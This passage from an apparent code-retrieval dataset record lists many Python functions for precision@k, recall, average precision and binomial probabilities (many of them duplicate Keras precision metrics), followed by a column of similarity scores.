We here set it to 0.\r\n\r\n recalls[uid] = n_rel_and_rec_k / n_rel if n_rel != 0 else 0\r\n\r\n return precisions, recalls", "def precision_at(\n ks: torch.Tensor, scores: torch.Tensor, labels: torch.Tensor\n) -> torch.Tensor:\n\n ks, scores, labels = _check_inputs(ks, scores, labels)\n _, _, topk_labels = _extract_topk(ks, scores, labels)\n precisions = _create_output_placeholder(scores, ks)\n\n for index, k in enumerate(ks):\n precisions[:, index] = torch.sum(topk_labels[:, : int(k)], dim=1) / float(k)\n\n return precisions", "def precision_at_k(r, k = None):\n assert k is None or k >= 1\n r = np.asarray(r)[:k] != 0\n if r.size != k and k is not None:\n raise ValueError('Relevance score length < k')\n return np.mean(r)", "def precision_recall_at_k(predictions, k, threshold):\n # First map the predictions to each user.\n user_est_true = defaultdict(list)\n for uid, _, true_r, est, _ in predictions:\n user_est_true[uid].append((est, true_r))\n\n precisions = dict()\n recalls = dict()\n for uid, user_ratings in user_est_true.items():\n\n # Sort user ratings by estimated value\n user_ratings.sort(key=lambda x: x[0], reverse=True)\n\n # Number of relevant items\n n_rel = sum((true_r >= threshold) for (_, true_r) in user_ratings)\n\n # Number of recommended items in top k\n n_rec_k = sum((est >= threshold) for (est, _) in user_ratings[:k])\n\n # Number of relevant and recommended items in top k\n n_rel_and_rec_k = sum(((true_r >= threshold) and (est >= threshold))\n for (est, true_r) in user_ratings[:k])\n\n # Precision@K: Proportion of recommended items that are relevant\n precisions[uid] = n_rel_and_rec_k / n_rec_k if n_rec_k != 0 else 1\n\n # Recall@K: Proportion of relevant items that are recommended\n recalls[uid] = n_rel_and_rec_k / n_rel if n_rel != 0 else 1\n\n # Precision and recall can then be averaged over all users\n overall_precisions = sum(\n prec for prec in precisions.values()) / len(precisions)\n overall_recalls = sum(rec for rec in recalls.values()) / len(recalls)\n\n return overall_precisions, overall_recalls", "def test2_precision_1d(self):\n arr1 = np.array([0, 1, 1])\n scores1 = np.array([0.2, 0.3, 0.5])\n scores1_not_sum_1 = np.array([x * 1542 for x in scores1])\n\n k = 1\n expected_normalized_precision_at_k = 1.0\n expected_precision_at_k = 1.0\n\n actual_normalized = ranking.precision_at_k(y_true=arr1, y_score=scores1, k=k, normalize=True)\n actual_normalized_not_sum_1 = ranking.precision_at_k(y_true=arr1, y_score=scores1_not_sum_1, k=k,\n normalize=True)\n actual = ranking.precision_at_k(y_true=arr1, y_score=scores1, k=k, normalize=False)\n actual_not_sum_1 = ranking.precision_at_k(y_true=arr1, y_score=scores1_not_sum_1, k=k, normalize=False)\n\n self.assertEqual(expected_normalized_precision_at_k, actual_normalized)\n self.assertEqual(expected_normalized_precision_at_k, actual_normalized_not_sum_1)\n self.assertEqual(expected_precision_at_k, actual)\n self.assertEqual(expected_precision_at_k, actual_not_sum_1)\n\n k = 2\n expected_normalized_precision_at_k = 1.0\n expected_precision_at_k = 1.0\n\n actual_normalized = ranking.precision_at_k(y_true=arr1, y_score=scores1, k=k, normalize=True)\n actual_normalized_not_sum_1 = ranking.precision_at_k(y_true=arr1, y_score=scores1_not_sum_1, k=k,\n normalize=True)\n actual = ranking.precision_at_k(y_true=arr1, y_score=scores1, k=k, normalize=False)\n actual_not_sum_1 = ranking.precision_at_k(y_true=arr1, y_score=scores1_not_sum_1, k=k, normalize=False)\n\n self.assertEqual(expected_normalized_precision_at_k, 
actual_normalized)\n self.assertEqual(expected_normalized_precision_at_k, actual_normalized_not_sum_1)\n self.assertEqual(expected_precision_at_k, actual)\n self.assertEqual(expected_precision_at_k, actual_not_sum_1)", "def pr_at_k(rels, expected_count, k):\n k = min(k, len(rels))\n TP = sum(rels[:k])\n FP = k - TP\n FN = expected_count - TP\n TN = len(rels[k:]) - sum(rels[k:])\n assert TN >= 0.0\n return TP / (TP + FP), TP / (TP + FN), TP / (TP + TN) if TP + TN > 0 else 0", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(output, target, topk=(1,)):\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / 
(predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def M_Precision(y_true, y_pred):\n\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.constant(K.epsilon()))\n return precision", "def retrieval_precision(preds: Tensor, target: Tensor, k: Optional[int]=None, adaptive_k: bool=False) ->Tensor:\n preds, target = _check_retrieval_functional_inputs(preds, target)\n if not isinstance(adaptive_k, bool):\n raise ValueError('`adaptive_k` has to be a boolean')\n if k is None or adaptive_k and k > preds.shape[-1]:\n k = preds.shape[-1]\n if not (isinstance(k, int) and k > 0):\n raise ValueError('`k` has to be a positive integer or None')\n if not target.sum():\n return tensor(0.0, device=preds.device)\n relevant = target[preds.topk(min(k, preds.shape[-1]), dim=-1)[1]].sum().float()\n return relevant / k", "def keras_precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def average_precision_at_k(targets, ranked_predictions, k=None):\n if k:\n ranked_predictions = ranked_predictions[:k]\n score = 0.0\n hits = 0.0\n for i, pred in enumerate(ranked_predictions):\n if pred in targets and pred not in ranked_predictions[:i]:\n hits += 1.0\n score += hits / (i + 1.0)\n divisor = min(len(targets), k) if k else len(targets)\n return score / divisor", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def 
precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n 
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def cdf(self, k):\n\n if k < 0 or k > self.n:\n return 0\n\n k = int(k)\n ans = 0\n for i in range(0, k + 1):\n ans += self.pmf(i)\n return ans", "def getPrecision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision", "def compute_pr_at_k(k, true_labels, test_statistics=None, pvalues=None):\n if (test_statistics is not None) and (pvalues is not None):\n raise ValueError(\"You cannot supply both `test_statistics` and `pvalues`.\")\n\n if test_statistics is not None:\n res = test_statistics\n reverse_sorting = True\n else:\n res = pvalues\n reverse_sorting = False\n\n label_matrix = np.zeros((len(true_labels), len(true_labels)))\n c1 = (true_labels == 0).sum()\n label_matrix[:c1, :c1] = 1\n\n triu_idx = np.triu_indices_from(res, k=1)\n labels_vec = label_matrix[triu_idx]\n res_vec = res[triu_idx]\n\n idx = np.argsort(res_vec)\n if reverse_sorting:\n idx = idx[::-1]\n sorted_labels = labels_vec[idx]\n\n if isinstance(k, int):\n ks = range(1, k + 1)\n else:\n ks = k\n\n precisions = [sorted_labels[:k].mean() for k in ks]\n recalls = [sorted_labels[:k].sum() / sorted_labels.sum() for k in ks]\n\n return precisions, recalls", "def numSubarrayProductLessThanK(self, nums: List[int], k: int) -> int:\n\n if not nums:\n return 0\n\n if k <= 1:\n return 0\n\n count = 0\n lo = 0\n product = 1\n for hi in range(len(nums)):\n product *= nums[hi]\n while product >= k:\n product /= nums[lo]\n lo += 1\n count += hi - lo + 1\n return count", "def prf_cal(y_pred,y_true,k):\r\n GT=np.sum(y_true[y_true==1.])\r\n instance_num=y_true.shape[0]\r\n prediction_num=instance_num*k\r\n\r\n sort_indices = np.argsort(y_pred)\r\n sort_indices=sort_indices[:,::-1]\r\n static_indices = np.indices(sort_indices.shape)\r\n sorted_annotation= y_true[static_indices[0],sort_indices]\r\n top_k_annotation=sorted_annotation[:,0:k]\r\n TP=np.sum(top_k_annotation[top_k_annotation==1.])\r\n recall=TP/GT\r\n precision=TP/prediction_num\r\n f1=2.*recall*precision/(recall+precision)\r\n return precision, recall, f1", "def apk(y_true, y_pred, k):\n \n # initialize p@k list of values\n pk_values = []\n \n # loop over all k. 
from 1 to k+1\n for i in range(1, k + 1):\n # calculate p@i and append to list\n pk_values.append(pk(y_true, y_pred, i))\n \n # if we have no values in the list, return 0\n if len(pk_values) == 0:\n return 0\n # else, we return the sum of list over length of list\n return sum(pk_values) / len(pk_values)", "def mapk(actual, predicted, k):\n return round(np.mean([apk(a,p,k) for a,p in zip(actual, predicted)]), 4) * 100", "def __init__(self, k=10, cutoff=0.5):\n if k < 0:\n raise ValueError('k must be positive')\n super(Precision, self).__init__()\n self.k = k\n self.cutoff = cutoff", "def _K(s):\n p = 0\n for k in range(-10, 10, 1):\n p += (-1)**k * np.exp(-2 * k**2 * s**2)\n return p", "def ensure_positive_precision(K):\n K_diag = np.diag(np.diag(K))\n K = np.where(np.any(np.diag(K) < 0), np.where(K_diag < 0, 1e-2, K_diag), K)\n return K", "def _compute_parameters(self, p, k):\n for i in range(self._.d + 1):\n p[0, i, i] = k[i]\n p[i, 0, i] = Integer(1)\n p[i, i, 0] = Integer(1)\n for i in range(self._.d):\n p[i+1, 1, i+1] = self._.a[i+1]\n p[i, 1, i+1] = self._.b[i]\n p[i+1, 1, i] = self._.c[i+1]\n for i in range(2, self._.d + 1):\n for j in range(1, self._.d + 1):\n for h in range(1, self._.d):\n p[h, i, j] = self._check_parameter(\n h, i, j,\n _simplify(_expand((\n self._.c[h] * p[h-1, i-1, j]\n + self._.b[h] * p[h+1, i-1, j]\n - self._.b[i-2] * p[h, i-2, j]\n + (self._.a[h] - self._.a[i-1]) * p[h, i-1, j]\n ) / self._.c[i])))\n p[self._.d, i, j] = self._check_parameter(\n self._.d, i, j,\n _simplify(_expand((\n self._.c[self._.d] * p[self._.d-1, i-1, j]\n - self._.b[i-2] * p[self._.d, i-2, j]\n + (self._.a[self._.d] - self._.a[i-1])\n * p[self._.d, i-1, j]\n ) / self._.c[i])))", "def _calculate_probability(self,k):\n\t\tif abs(k * self.delta_x) > (3 * np.sqrt(self.variance)):\n\t\t\treturn 0.0\n\t\tbinom_coeff = special.binom(self.n,(self.n + k)/2)\n\t\tb_value = binom_coeff * ((self.p) ** ((self.n + k)/2)) * ((1-self.p) ** ((self.n - k)/2))\n\t\treturn b_value", "def kx(self, k: int) -> float:\n result = self._read_inline(f\"kx({k})\")\n return result", "def pmf(self, k):\n\n if k < 0 or k > self.n:\n return 0\n\n k = int(k)\n\n c = (Binomial.factorial(self.n)) / \\\n (Binomial.factorial(k) * self.factorial((self.n - k)))\n\n return c * pow(self.p, k) * pow((1 - self.p), (self.n - k))", "def probability(n, k, p):\n prob = 0\n power = expotentation_by_squaring((1-p), n)\n count_mult = math.log(n, 2)\n p_fraction = p/(1-p)\n count_mult += 1\n for i in range(0, k+1):\n element = newton(n, i)*power\n prob += element\n power *= p_fraction\n count_mult += 2\n return prob, count_mult", "def precision(y_true, y_pred):\n true_positives = bk.sum(bk.round(bk.clip(y_true * y_pred, 0, 1)))\n predicted_positives = bk.sum(bk.round(bk.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + bk.epsilon())\n return precision", "def recall_at_k(self, positions, k, num_samples):\n return 1.0 * sum(i <= k for i in positions) / num_samples", "def params_to_precision(kernel):\n\n return kernel.precision()", "def pkscore(labels, preds, k=10):\n # Remove padding from labels and preds\n mask = np.where(labels<=1, True, False)\n labels = labels[mask]\n preds = preds[mask]\n\n num_windows = len(labels) - k + 1\n assert num_windows>0, 'Choose a smaller k value'\n\n correct = 0\n for i in range(num_windows):\n # calculate index of window close\n j = i + k\n\n # Get number of segment splits in labels and preds\n label_diff = sum(labels[i:j])\n pred_diff = sum(preds[i:j])\n\n # Check for agreement 
between labels and preds\n if (label_diff and pred_diff) or (not label_diff and not pred_diff):\n correct += 1\n return 1-(correct/(num_windows))", "def queryPrecision(self, query_doc_IDs_ordered, query_id, true_doc_IDs, k):\n\n\t\tprecision = -1\n\n\t\t#Fill in code here\n\t\trel_ret = 0 # no. of relevant docs retrieved\n\n\t\tfor docID in query_doc_IDs_ordered[:k]:\n\t\t\tif docID in true_doc_IDs:\n\t\t\t\trel_ret += 1\n\n\t\tprecision = rel_ret/k\n\n\t\treturn precision", "def expected_jk_variance(K):\r\n\r\n kf = float(K)\r\n return ((1 / kf) * (kf - 1) / (kf - 0.5) *\r\n ((kf - 1) / (kf - 2)) ** 2 * (kf - 3) / (kf - 2))", "def test_approximate_gamma(self, k):\n mean_column = prior.PriorParams.field_index(\"mean\")\n var_column = prior.PriorParams.field_index(\"var\")\n x = self.priors[self.n][k][mean_column]\n xvar = self.priors[self.n][k][var_column]\n # match mean/variance\n alpha_0, beta_0 = approximate_gamma_mom(x, xvar)\n ck_x = alpha_0 / beta_0\n ck_xvar = alpha_0 / beta_0**2\n assert np.isclose(x, ck_x)\n assert np.isclose(xvar, ck_xvar)\n # match approximate sufficient statistics\n logx, _, _ = approx.approximate_log_moments(x, xvar)\n alpha_1, beta_1 = approx.approximate_gamma_kl(x, logx)\n ck_x = alpha_1 / beta_1\n ck_logx = hypergeo._digamma(alpha_1) - np.log(beta_1)\n assert np.isclose(x, ck_x)\n assert np.isclose(logx, ck_logx)\n # compare KL divergence between strategies\n kl_0 = kl_divergence(\n lambda x: conditional_coalescent_pdf(x, self.n, k),\n lambda x: scipy.stats.gamma.logpdf(x, alpha_0, scale=1 / beta_0),\n )\n kl_1 = kl_divergence(\n lambda x: conditional_coalescent_pdf(x, self.n, k),\n lambda x: scipy.stats.gamma.logpdf(x, alpha_1, scale=1 / beta_1),\n )\n assert kl_1 < kl_0", "def topk_accuracies(preds, labels, ks):\n num_topks_correct = topks_correct(preds, labels, ks)\n return [(x / preds.size(0)) * 100.0 for x in num_topks_correct]", "def precision_on_1(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision", "def pmf(self, k):\n if k % 1 != 0:\n k = int(k)\n if k < 0 and k <= self.n:\n return 0\n q = 1 - self.p\n co = (self.factorial(self.n) / ((self.factorial(self.n-k)\n * self.factorial(k))))\n q2 = q ** (self.n - k)\n return co * (self.p ** k) * q2", "def C(n,k):\n if 0 <= k <= n:\n ntok = 1\n ktok = 1\n for t in xrange(1, min(k, n - k) + 1):\n ntok *= n\n ktok *= t\n n -= 1\n return ntok // ktok\n else:\n return 0", "def f1_score_at_k(r, max_rel, k = None):\n p = precision_at_k(r, k)\n r = recall_at_k(r, max_rel, k)\n return 2 * p * r / (p + r)", "def calPFP(n, m, k):\n return pow(1-math.exp(-k*(n+0.5)/(m-1)), k)", "def kepler(x, k=1.0):\n assert(x.shape[2] == 1)\n\n q,p = extract_q_p(x)\n # The derivative of r wrt q is 1/sqrt(sum(q^2)), which is singular in 0.\n # Cutoff r so that it is > eps.\n eps = 1e-5\n r = tf.sqrt(tf.reduce_sum(tf.square(q), axis=1) + eps)\n return tf.squeeze(0.5 * tf.reduce_sum(tf.square(p), axis=1) + k / r)", "def superobl_p(k):\n if k%2==0:\n return 1/2 + 1/(2*(k+1))\n else:\n return 1/2 + 1/(2*k)", "def choose(n, k):\r\n if 0 <= k <= n:\r\n ntok = 1\r\n ktok = 1\r\n for t in range(1, min(k, n - k) + 1):\r\n ntok *= n\r\n ktok *= t\r\n n -= 1\r\n return ntok // ktok\r\n else:\r\n return 0", "def test_kpa_conversion(self):\n\n result = get_kpa(5.6, 25)\n\n self.assertTrue(result == -34.281679)", "def pow_derpy(x, k):\n if k == 1:\n return x\n if k == 0:\n 
return 1\n\n return x * pow_derpy(x, k - 1)", "def k_rank_approximate(doc_matrix, k):\n return []", "def n_choose_k(n: int, k: int) -> int:\n # Edge case, no possible way to choose.\n if k > n or k < 0 or n < 0: return 0\n # We choose the min of k or n - k\n # since nCk == nC(n - k).\n k = min(k, n - k)\n # The numerator represents the product\n # n * (n - 1) * (n - 2) * ... * (n - k - 1)\n numerator = reduce(mul, range(n, n - k, -1), 1)\n # The denominator represents the product\n # 1 * 2 * ... * k\n denominator = reduce(mul, range(1, k + 1), 1)\n # return the result as an integer.\n return numerator // denominator", "def precisions(self):\n raise NotImplementedError", "def get_precision(self):\n ...", "def pk(y_true, y_pred, k):\n \n # if k is 0, return 0. we should never have this\n # as k is always >= 1\n if k == 0:\n return 0\n # we are interested only in top-k predictions\n y_pred = y_pred[:k]\n \n # convert predictions to set\n pred_set = set(y_pred)\n \n # convert actual values to set\n true_set = set(y_true)\n \n # find common values\n common_values = pred_set.intersection(true_set)\n \n # return length of common values over k\n return len(common_values) / len(y_pred[:k])", "def ranking_precision_score(y_true, y_score, k=10):\n unique_y = np.unique(y_true)\n\n if len(unique_y) > 2:\n raise ValueError(\"Only supported for two relevance levels.\")\n\n n_relevant = 0\n n_pos = 0\n for relevance_score in y_true:\n if relevance_score == 1:\n n_pos += 1\n\n for index in y_score[:k]:\n if y_true[index] == 1:\n n_relevant += 1\n\n # Divide by min(n_pos, k) such that the best achievable score is always 1.0.\n return float(n_relevant) / min(n_pos, k) if min(n_pos, k) > 0 else 0", "def kpdf(t,c,tau,k):\n return k*(1-st.gamma.cdf(t,c,loc=0,scale=tau))+(1-k*t)*st.gamma.pdf(t,c,loc=0,scale=tau)", "def __init__(self, k=10, cutoff=0.5):\n if k < 0:\n raise ValueError('k must be positive')\n super(PrecisionLower, self).__init__(k, cutoff)", "def precision(classifier_output, true_labels):\n\n # TODO: finish this.\n conf_matrix = confusion_matrix(classifier_output, true_labels)\n return conf_matrix[0][0]/(conf_matrix[0][0] + conf_matrix[1][0])", "def precision_m(self, y_true, y_pred):\n true_positives = keras.backend.sum(keras.backend.round(keras.backend.clip(y_true * y_pred, 0, 1)))\n predicted_positives = keras.backend.sum(keras.backend.round(keras.backend.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + keras.backend.epsilon())\n return precision", "def nCk(n, k):\n return factorial(n)//factorial(k)//factorial(n-k)", "def precision(y_true, y_pred):\n true_positives = backend.sum(backend.round(backend.clip(y_true * y_pred, 0, 1)))\n predicted_positives = backend.sum(backend.round(backend.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + backend.epsilon())\n return precision", "def calc(k):\n n = factorial(4*k) * (1103.0 + 26390.0*k)\n d = factorial(k)**4 * 396.0**(4.0*k)\n z = n/d\n return z", "def __init__(self, k=10, cutoff=0.5):\n if k < 0:\n raise ValueError('k must be positive')\n super(PrecisionUpper, self).__init__(k, cutoff)", "def mean_avg_prec_at_k(question_set, candidate_set, k=None):\n # TODO(umaroy): add test for this method on a known set of encodings.\n # Current run_xreqa_eval.sh with X_Y encodings generates mAP of 0.628.\n all_questions = question_set.as_list()\n all_candidates = candidate_set.as_list()\n for embedding_type in ['sentences_and_contexts']:\n candidate_matrix = np.concatenate(\n 
[np.expand_dims(i.encoding[embedding_type], 0) for i in all_candidates],\n axis=0)\n\n ap_scores = []\n for q in all_questions:\n question_vec = np.expand_dims(q.encoding, 0)\n scores = question_vec.dot(candidate_matrix.T)\n y_true = np.zeros(scores.shape[1])\n all_correct_cands = set(candidate_set.by_xling_id[q.xling_id])\n for ans in all_correct_cands:\n y_true[candidate_set.pos[ans]] = 1\n ap_scores.append(average_precision_at_k(\n np.where(y_true == 1)[0], np.squeeze(scores).argsort()[::-1], k))\n print(embedding_type + \": \" + str(np.mean(ap_scores)))" ]
[ "0.76427615", "0.74189496", "0.7418079", "0.72710466", "0.72456723", "0.72446615", "0.7237539", "0.72213703", "0.7210107", "0.7058935", "0.6852219", "0.6786084", "0.67836976", "0.6768417", "0.67273885", "0.67181736", "0.67181736", "0.67181736", "0.67181736", "0.67181736", "0.67181736", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67165935", "0.67089933", "0.66921306", "0.66757774", "0.66481805", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.66469735", "0.6637747", "0.6631698", "0.65775067", "0.6533178", "0.6527984", "0.65041053", "0.6500147", "0.6457458", "0.6433143", "0.63926375", "0.6376261", "0.63702464", "0.63491803", "0.63410544", "0.6314881", "0.6307336", "0.62782466", "0.6258641", "0.62575054", "0.62385947", "0.6232881", "0.62196195", "0.61937124", "0.61900115", "0.61764354", "0.6156905", "0.61399555", "0.61389506", "0.6136565", "0.61267686", "0.61231154", "0.61223644", "0.61219835", "0.61058086", "0.6096785", "0.6091392", "0.60853106", "0.6082413", "0.6075436", "0.60727143", "0.60661167", "0.60641485", "0.6061439", "0.60593694", "0.6053266", "0.602791", "0.60272074", "0.6020167" ]
0.0
-1
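The negatives in the row above repeatedly define precision-at-k helpers (pk, apk, mapk). As a quick, hedged sanity check that is not part of the dataset, the following minimal, self-contained sketch re-implements the two visible helpers and exercises them on made-up lists; the names relevant and ranked and their values are assumptions for illustration only.

def pk(y_true, y_pred, k):
    # precision@k: fraction of the top-k predictions that are relevant
    if k == 0:
        return 0
    y_pred = y_pred[:k]
    return len(set(y_pred) & set(y_true)) / len(y_pred)

def apk(y_true, y_pred, k):
    # average precision@k: mean of precision@i for i = 1..k
    pk_values = [pk(y_true, y_pred, i) for i in range(1, k + 1)]
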